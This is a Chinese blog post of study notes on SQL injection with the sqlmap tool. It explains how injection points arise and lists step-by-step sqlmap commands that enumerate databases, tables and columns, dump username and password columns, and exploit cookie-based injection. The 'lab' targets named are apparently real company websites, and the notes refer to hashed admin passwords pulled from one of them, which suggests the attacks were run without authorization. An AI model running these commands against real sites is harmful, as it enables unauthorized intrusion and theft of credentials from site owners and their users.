Sqlmap学习记录

in web安全 Views: 2,392 s with 0 comment

http://www.ichunqiu.com/course/1377 学习笔记】

常用工具:

啊D,明小子,NBSI,御剑

ASP

Asp网站:大多用access 文件数据库和mssql

如何形成的注入漏洞

Select * from Users where ID = 1

www.czypjx.com/info?id=1 假如这个是一个注入点

www.czypjx.com/info?id=1' 就是这样Select * from Users where ID = 1'

sqlmap常用命令

sqlmap –u “url”

-u检测是否存在注入漏洞, Return sql name

Sqlmap –u “url” --tables</span>     //把全部的表列出来

猜解所有表名             User //应该是用户表

Sqlmap –u “url” –-columns –T”user”

--columns    //猜列名

-T                //根据user表猜列名

肯定还有password列

Sqlmap –u “url” --dump –C”username,password” –T”user”

--dump 下载数据

-C”username,password”  列名

PHP

一般是mysql

实验链接:http://www.ggec.com.cn/oneNews.php?id=69

Sqlmap –u “url”           //检测
Sqlmap –u “url”     --dba    //检测dba权限,拥有写目录的权限

发现这个的mysql是5.0权限

Sqlmap –u “url”     --dbs    //把所有的数据库列出来

Sqlmap –u “url”     --current-db     //查找自己的数据库
Sqlmap –u “url”     --tables –D”sqlname”  //根据刚才找出来的数据库名查表

根据ggec_admin来查表

Sqlmap –u”url” --columns  –T “ggec_admin” –D”ggec”     //查询所有列

Sqlmap –u”url” --dump -C “username,password” –T “ggec_admin” –D”ggec”        //查询所有列的字段

下方的密码经过md5加密

Cookie注入

实验链接:http://www.wisefund.com.cn/about.asp?id=56

Sqlmap –u http://www.wisefund.com.cn/about.asp --cookie “id=56” --level 2

--cookie “id=56”      //这里写id的参数

如果是cookie注入,就要把等级提升为level2

Sqlmap –u http://www.wisefund.com.cn/about.asp --tables --cookie “id=56” --level 2

开始拆表

后面照旧

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

薇拉航线

(๑>ڡ<)☆谢谢老板~

使用微信扫描二维码完成支付

Comments are closed.